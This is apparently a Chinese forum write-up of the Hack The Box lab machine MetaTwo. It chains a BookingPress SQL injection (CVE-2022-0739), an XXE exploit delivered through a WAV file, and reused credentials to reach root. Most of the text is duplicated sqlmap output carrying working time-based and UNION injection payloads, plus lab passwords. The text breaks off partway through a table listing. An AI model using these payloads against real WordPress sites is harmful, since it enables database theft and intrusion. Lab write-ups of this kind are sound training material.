-
-
[原创]HTB MetaTwo (easy)
-
发表于: 2022-12-4 00:41 951
-
参考原文:https://0xdedinfosec.vercel.app/blog/hackthebox-metatwo-writeup
开启了21 22 80
网址为http://metapress.htb/
安装Wappalyzer可以看到网站信息
查看源码后可以看到wordpress插件信息
查找对应插件版本的漏洞
CVE-2022-0739
https ://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357
该CVE有POC,根据POC先周到_wpnonce的值
bp抓包下来保存为admin.req
处理admin.req中的注入参数
列出所有databases
列出数据库 blog的table
dump wp_users表
解一下密码
成功跑出了密码partylikearockstar
跑一下目录
使用manager账户密码在wp-admin登录
查找对应版本的漏洞CVE-2021-29447
https://tryhackme.com/room/wordpresscve202129447
我们需要创建一个WAV文件,该文件将获取另一个名为的文件dedsec.dtd,其中包含我们的恶意代码
启动PHP服务器
得到了/etc/passwd
让我们获取 WordPresswp-config.php文件
得到了路径/var/www/metapress.htb/blog
FTP用户创建
用户名:metapress.htb
密码:9NYS_ii@FyL_p5M2NvJ
获得了send_email.php,查看文件获得Jnelson 用户密码Cb4_JmWM8zUZWMu@Ys
ssh jnelson@10.10.11.186
发现passpie
通过 google 搜索passpie得到一个Command-line password manager用 python 编写的工具https ://github.com/marcwebbie/passpie
来 尝试破解key
将key下载下来
留下私钥
转成john格式
获得密码blink182
获得root密码 p7qfAZt4_A1xo_0x
su root
cd ~
cat root.txt
POST
/
wp
-
admin
/
admin
-
ajax.php HTTP
/
1.1
Host: metapress.htb
User
-
Agent: curl
/
7.84
.
0
Accept:
*
/
*
Content
-
Length:
185
Content
-
Type
: application
/
x
-
www
-
form
-
urlencoded
Connection: close
action
=
bookingpress_front_get_category_services&_wpnonce
=
73608887bb
&category_id
=
33
&total_service
=
1
POST
/
wp
-
admin
/
admin
-
ajax.php HTTP
/
1.1
Host: metapress.htb
User
-
Agent: curl
/
7.84
.
0
Accept:
*
/
*
Content
-
Length:
185
Content
-
Type
: application
/
x
-
www
-
form
-
urlencoded
Connection: close
action
=
bookingpress_front_get_category_services&_wpnonce
=
73608887bb
&category_id
=
33
&total_service
=
1
$ sqlmap
-
r admin.req
-
p total_service
-
-
batch
[
*
] starting @
08
:
54
:
24
/
2022
-
12
-
03
/
[
08
:
54
:
24
] [INFO] parsing HTTP request
from
'admin.req'
[
08
:
54
:
25
] [INFO] testing connection to the target URL
[
08
:
54
:
28
] [INFO] checking
if
the target
is
protected by some kind of WAF
/
IPS
[
08
:
54
:
29
] [INFO] testing
if
the target URL content
is
stable
[
08
:
54
:
30
] [INFO] target URL content
is
stable
[
08
:
54
:
31
] [WARNING] heuristic (basic) test shows that POST parameter
'total_service'
might
not
be injectable
[
08
:
54
:
33
] [INFO] testing
for
SQL injection on POST parameter
'total_service'
[
08
:
54
:
33
] [INFO] testing
'AND boolean-based blind - WHERE or HAVING clause'
[
08
:
54
:
39
] [INFO] testing
'Boolean-based blind - Parameter replace (original value)'
[
08
:
54
:
41
] [INFO] testing
'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[
08
:
54
:
46
] [INFO] testing
'PostgreSQL AND error-based - WHERE or HAVING clause'
[
08
:
54
:
52
] [INFO] testing
'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[
08
:
54
:
58
] [INFO] testing
'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[
08
:
55
:
04
] [INFO] testing
'Generic inline queries'
[
08
:
55
:
05
] [INFO] testing
'PostgreSQL > 8.1 stacked queries (comment)'
[
08
:
55
:
05
] [WARNING] time
-
based comparison requires larger statistical model, please wait. (done)
[
08
:
55
:
12
] [INFO] testing
'Microsoft SQL Server/Sybase stacked queries (comment)'
[
08
:
55
:
18
] [INFO] testing
'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[
08
:
55
:
23
] [INFO] testing
'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[
08
:
55
:
36
] [INFO] POST parameter
'total_service'
appears to be
'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
injectable
it looks like the back
-
end DBMS
is
'MySQL'
. Do you want to skip test payloads specific
for
other DBMSes? [Y
/
n] Y
for
the remaining tests, do you want to include
all
tests
for
'MySQL'
extending provided level (
1
)
and
risk (
1
) values? [Y
/
n] Y
[
08
:
55
:
36
] [INFO] testing
'Generic UNION query (NULL) - 1 to 20 columns'
[
08
:
55
:
36
] [INFO] automatically extending ranges
for
UNION query injection technique tests as there
is
at least one other (potential) technique found
[
08
:
56
:
06
] [INFO] target URL appears to be UNION injectable with
9
columns
[
08
:
56
:
12
] [INFO] POST parameter
'total_service'
is
'Generic UNION query (NULL) - 1 to 20 columns'
injectable
POST parameter
'total_service'
is
vulnerable. Do you want to keep testing the others (
if
any
)? [y
/
N] N
sqlmap identified the following injection point(s) with a total of
68
HTTP(s) requests:
-
-
-
Parameter: total_service (POST)
Type
: time
-
based blind
Title: MySQL >
=
5.0
.
12
AND time
-
based blind (query SLEEP)
Payload: action
=
bookingpress_front_get_category_services&_wpnonce
=
73608887bb
&category_id
=
33
&total_service
=
1
) AND (SELECT
9646
FROM (SELECT(SLEEP(
5
)))LdKc) AND (
6557
=
6557
Type
: UNION query
Title: Generic UNION query (NULL)
-
9
columns
Payload: action
=
bookingpress_front_get_category_services&_wpnonce
=
73608887bb
&category_id
=
33
&total_service
=
1
) UNION
ALL
SELECT NULL,CONCAT(
0x716b787871
,
0x4b614a6e69454e444a727549686572497163796b646b6b6a4a4854527562474e6f4b576e5a505177
,
0x71786a7071
),NULL,NULL,NULL,NULL,NULL,NULL,NULL
-
-
-
-
-
-
[
08
:
56
:
12
] [INFO] the back
-
end DBMS
is
MySQL
web application technology: Nginx
1.18
.
0
, PHP
8.0
.
24
back
-
end DBMS: MySQL >
=
5.0
.
12
(MariaDB fork)
[
08
:
56
:
13
] [INFO] fetched data logged to text files under
'/home/xxx/.local/share/sqlmap/output/metapress.htb'
[
*
] ending @
08
:
56
:
13
/
2022
-
12
-
03
/
$ sqlmap
-
r admin.req
-
p total_service
-
-
batch
[
*
] starting @
08
:
54
:
24
/
2022
-
12
-
03
/
[
08
:
54
:
24
] [INFO] parsing HTTP request
from
'admin.req'
[
08
:
54
:
25
] [INFO] testing connection to the target URL
[
08
:
54
:
28
] [INFO] checking
if
the target
is
protected by some kind of WAF
/
IPS
[
08
:
54
:
29
] [INFO] testing
if
the target URL content
is
stable
[
08
:
54
:
30
] [INFO] target URL content
is
stable
[
08
:
54
:
31
] [WARNING] heuristic (basic) test shows that POST parameter
'total_service'
might
not
be injectable
[
08
:
54
:
33
] [INFO] testing
for
SQL injection on POST parameter
'total_service'
[
08
:
54
:
33
] [INFO] testing
'AND boolean-based blind - WHERE or HAVING clause'
[
08
:
54
:
39
] [INFO] testing
'Boolean-based blind - Parameter replace (original value)'
[
08
:
54
:
41
] [INFO] testing
'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[
08
:
54
:
46
] [INFO] testing
'PostgreSQL AND error-based - WHERE or HAVING clause'
[
08
:
54
:
52
] [INFO] testing
'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[
08
:
54
:
58
] [INFO] testing
'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[
08
:
55
:
04
] [INFO] testing
'Generic inline queries'
[
08
:
55
:
05
] [INFO] testing
'PostgreSQL > 8.1 stacked queries (comment)'
[
08
:
55
:
05
] [WARNING] time
-
based comparison requires larger statistical model, please wait. (done)
[
08
:
55
:
12
] [INFO] testing
'Microsoft SQL Server/Sybase stacked queries (comment)'
[
08
:
55
:
18
] [INFO] testing
'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[
08
:
55
:
23
] [INFO] testing
'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[
08
:
55
:
36
] [INFO] POST parameter
'total_service'
appears to be
'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
injectable
it looks like the back
-
end DBMS
is
'MySQL'
. Do you want to skip test payloads specific
for
other DBMSes? [Y
/
n] Y
for
the remaining tests, do you want to include
all
tests
for
'MySQL'
extending provided level (
1
)
and
risk (
1
) values? [Y
/
n] Y
[
08
:
55
:
36
] [INFO] testing
'Generic UNION query (NULL) - 1 to 20 columns'
[
08
:
55
:
36
] [INFO] automatically extending ranges
for
UNION query injection technique tests as there
is
at least one other (potential) technique found
[
08
:
56
:
06
] [INFO] target URL appears to be UNION injectable with
9
columns
[
08
:
56
:
12
] [INFO] POST parameter
'total_service'
is
'Generic UNION query (NULL) - 1 to 20 columns'
injectable
POST parameter
'total_service'
is
vulnerable. Do you want to keep testing the others (
if
any
)? [y
/
N] N
sqlmap identified the following injection point(s) with a total of
68
HTTP(s) requests:
-
-
-
Parameter: total_service (POST)
Type
: time
-
based blind
Title: MySQL >
=
5.0
.
12
AND time
-
based blind (query SLEEP)
Payload: action
=
bookingpress_front_get_category_services&_wpnonce
=
73608887bb
&category_id
=
33
&total_service
=
1
) AND (SELECT
9646
FROM (SELECT(SLEEP(
5
)))LdKc) AND (
6557
=
6557
Type
: UNION query
Title: Generic UNION query (NULL)
-
9
columns
Payload: action
=
bookingpress_front_get_category_services&_wpnonce
=
73608887bb
&category_id
=
33
&total_service
=
1
) UNION
ALL
SELECT NULL,CONCAT(
0x716b787871
,
0x4b614a6e69454e444a727549686572497163796b646b6b6a4a4854527562474e6f4b576e5a505177
,
0x71786a7071
),NULL,NULL,NULL,NULL,NULL,NULL,NULL
-
-
-
-
-
-
[
08
:
56
:
12
] [INFO] the back
-
end DBMS
is
MySQL
web application technology: Nginx
1.18
.
0
, PHP
8.0
.
24
back
-
end DBMS: MySQL >
=
5.0
.
12
(MariaDB fork)
[
08
:
56
:
13
] [INFO] fetched data logged to text files under
'/home/xxx/.local/share/sqlmap/output/metapress.htb'
[
*
] ending @
08
:
56
:
13
/
2022
-
12
-
03
/
$ sqlmap
-
r admin.req
-
p total_service
-
-
dbs
[
*
] starting @
08
:
56
:
32
/
2022
-
12
-
03
/
[
08
:
56
:
32
] [INFO] parsing HTTP request
from
'admin.req'
[
08
:
56
:
32
] [INFO] resuming back
-
end DBMS
'mysql'
[
08
:
56
:
32
] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s)
from
stored session:
-
-
-
Parameter: total_service (POST)
Type
: time
-
based blind
Title: MySQL >
=
5.0
.
12
AND time
-
based blind (query SLEEP)
Payload: action
=
bookingpress_front_get_category_services&_wpnonce
=
73608887bb
&category_id
=
33
&total_service
=
1
) AND (SELECT
9646
FROM (SELECT(SLEEP(
5
)))LdKc) AND (
6557
=
6557
Type
: UNION query
Title: Generic UNION query (NULL)
-
9
columns
Payload: action
=
bookingpress_front_get_category_services&_wpnonce
=
73608887bb
&category_id
=
33
&total_service
=
1
) UNION
ALL
SELECT NULL,CONCAT(
0x716b787871
,
0x4b614a6e69454e444a727549686572497163796b646b6b6a4a4854527562474e6f4b576e5a505177
,
0x71786a7071
),NULL,NULL,NULL,NULL,NULL,NULL,NULL
-
-
-
-
-
-
[
08
:
56
:
33
] [INFO] the back
-
end DBMS
is
MySQL
web application technology: Nginx
1.18
.
0
, PHP
8.0
.
24
back
-
end DBMS: MySQL >
=
5.0
.
12
(MariaDB fork)
[
08
:
56
:
33
] [INFO] fetching database names
available databases [
2
]:
[
*
] blog
[
*
] information_schema
[
08
:
56
:
34
] [INFO] fetched data logged to text files under
'/home/xxx/.local/share/sqlmap/output/metapress.htb'
[
*
] ending @
08
:
56
:
34
/
2022
-
12
-
03
/
$ sqlmap
-
r admin.req
-
p total_service
-
-
dbs
[
*
] starting @
08
:
56
:
32
/
2022
-
12
-
03
/
[
08
:
56
:
32
] [INFO] parsing HTTP request
from
'admin.req'
[
08
:
56
:
32
] [INFO] resuming back
-
end DBMS
'mysql'
[
08
:
56
:
32
] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s)
from
stored session:
-
-
-
Parameter: total_service (POST)
Type
: time
-
based blind
Title: MySQL >
=
5.0
.
12
AND time
-
based blind (query SLEEP)
Payload: action
=
bookingpress_front_get_category_services&_wpnonce
=
73608887bb
&category_id
=
33
&total_service
=
1
) AND (SELECT
9646
FROM (SELECT(SLEEP(
5
)))LdKc) AND (
6557
=
6557
Type
: UNION query
Title: Generic UNION query (NULL)
-
9
columns
Payload: action
=
bookingpress_front_get_category_services&_wpnonce
=
73608887bb
&category_id
=
33
&total_service
=
1
) UNION
ALL
SELECT NULL,CONCAT(
0x716b787871
,
0x4b614a6e69454e444a727549686572497163796b646b6b6a4a4854527562474e6f4b576e5a505177
,
0x71786a7071
),NULL,NULL,NULL,NULL,NULL,NULL,NULL
-
-
-
-
-
-
[
08
:
56
:
33
] [INFO] the back
-
end DBMS
is
MySQL
web application technology: Nginx
1.18
.
0
, PHP
8.0
.
24
back
-
end DBMS: MySQL >
=
5.0
.
12
(MariaDB fork)
[
08
:
56
:
33
] [INFO] fetching database names
available databases [
2
]:
[
*
] blog
[
*
] information_schema
[
08
:
56
:
34
] [INFO] fetched data logged to text files under
'/home/xxx/.local/share/sqlmap/output/metapress.htb'
[
*
] ending @
08
:
56
:
34
/
2022
-
12
-
03
/
$ sqlmap
-
r admin.req
-
p total_service
-
D blog
-
-
tables
[
*
] starting @
08
:
59
:
43
/
2022
-
12
-
03
/
[
08
:
59
:
43
] [INFO] parsing HTTP request
from
'admin.req'
[
08
:
59
:
43
] [INFO] resuming back
-
end DBMS
'mysql'
[
08
:
59
:
43
] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s)
from
stored session:
-
-
-
Parameter: total_service (POST)
Type
: time
-
based blind
Title: MySQL >
=
5.0
.
12
AND time
-
based blind (query SLEEP)
Payload: action
=
bookingpress_front_get_category_services&_wpnonce
=
73608887bb
&category_id
=
33
&total_service
=
1
) AND (SELECT
9646
FROM (SELECT(SLEEP(
5
)))LdKc) AND (
6557
=
6557
Type
: UNION query
Title: Generic UNION query (NULL)
-
9
columns
Payload: action
=
bookingpress_front_get_category_services&_wpnonce
=
73608887bb
&category_id
=
33
&total_service
=
1
) UNION
ALL
SELECT NULL,CONCAT(
0x716b787871
,
0x4b614a6e69454e444a727549686572497163796b646b6b6a4a4854527562474e6f4b576e5a505177
,
0x71786a7071
),NULL,NULL,NULL,NULL,NULL,NULL,NULL
-
-
-
-
-
-
[
08
:
59
:
45
] [INFO] the back
-
end DBMS
is
MySQL
web application technology: Nginx
1.18
.
0
, PHP
8.0
.
24
back
-
end DBMS: MySQL >
=
5.0
.
12
(MariaDB fork)
[
08
:
59
:
45
] [INFO] fetching tables
for
database:
'blog'
Database: blog
[
27
tables]
+
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
+
| wp_bookingpress_appointment_bookings |
| wp_bookingpress_categories |
| wp_bookingpress_customers |
| wp_bookingpress_customers_meta |
| wp_bookingpress_customize_settings |
| wp_bookingpress_debug_payment_log |
| wp_bookingpress_default_daysoff |
| wp_bookingpress_default_workhours |
| wp_bookingpress_entries |
| wp_bookingpress_form_fields |
| wp_bookingpress_notifications |
| wp_bookingpress_payment_logs |
| wp_bookingpress_services |
| wp_bookingpress_servicesmeta |
| wp_bookingpress_settings |
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
+
[
08
:
59
:
47
] [INFO] fetched data logged to text files under
'/home/xxx/.local/share/sqlmap/output/metapress.htb'
[
*
] ending @
08
:
59
:
47
/
2022
-
12
-
03
/
$ sqlmap
-
r admin.req
-
p total_service
-
D blog
-
-
tables
[
*
] starting @
08
:
59
:
43
/
2022
-
12
-
03
/
[
08
:
59
:
43
] [INFO] parsing HTTP request
from
'admin.req'
[
08
:
59
:
43
] [INFO] resuming back
-
end DBMS
'mysql'
[
08
:
59
:
43
] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s)
from
stored session:
-
-
-
Parameter: total_service (POST)
Type
: time
-
based blind
Title: MySQL >
=
5.0
.
12
AND time
-
based blind (query SLEEP)
Payload: action
=
bookingpress_front_get_category_services&_wpnonce
=
73608887bb
&category_id
=
33
&total_service
=
1
) AND (SELECT
9646
FROM (SELECT(SLEEP(
5
)))LdKc) AND (
6557
=
6557
Type
: UNION query
Title: Generic UNION query (NULL)
-
9
columns
Payload: action
=
bookingpress_front_get_category_services&_wpnonce
=
73608887bb
&category_id
=
33
&total_service
=
1
) UNION
ALL
SELECT NULL,CONCAT(
0x716b787871
,
0x4b614a6e69454e444a727549686572497163796b646b6b6a4a4854527562474e6f4b576e5a505177
,
0x71786a7071
),NULL,NULL,NULL,NULL,NULL,NULL,NULL
-
-
-
-
-
-
[
08
:
59
:
45
] [INFO] the back
-
end DBMS
is
MySQL
web application technology: Nginx
1.18
.
0
, PHP
8.0
.
24
back
-
end DBMS: MySQL >
=
5.0
.
12
(MariaDB fork)
[
08
:
59
:
45
] [INFO] fetching tables
for
database:
'blog'
Database: blog
[
27
tables]
+
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
+
| wp_bookingpress_appointment_bookings |
| wp_bookingpress_categories |
| wp_bookingpress_customers |
| wp_bookingpress_customers_meta |
| wp_bookingpress_customize_settings |
| wp_bookingpress_debug_payment_log |
| wp_bookingpress_default_daysoff |
| wp_bookingpress_default_workhours |
| wp_bookingpress_entries |
| wp_bookingpress_form_fields |
| wp_bookingpress_notifications |
| wp_bookingpress_payment_logs |
| wp_bookingpress_services |
| wp_bookingpress_servicesmeta |
| wp_bookingpress_settings |
| wp_commentmeta |
| wp_comments |
| wp_links |
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!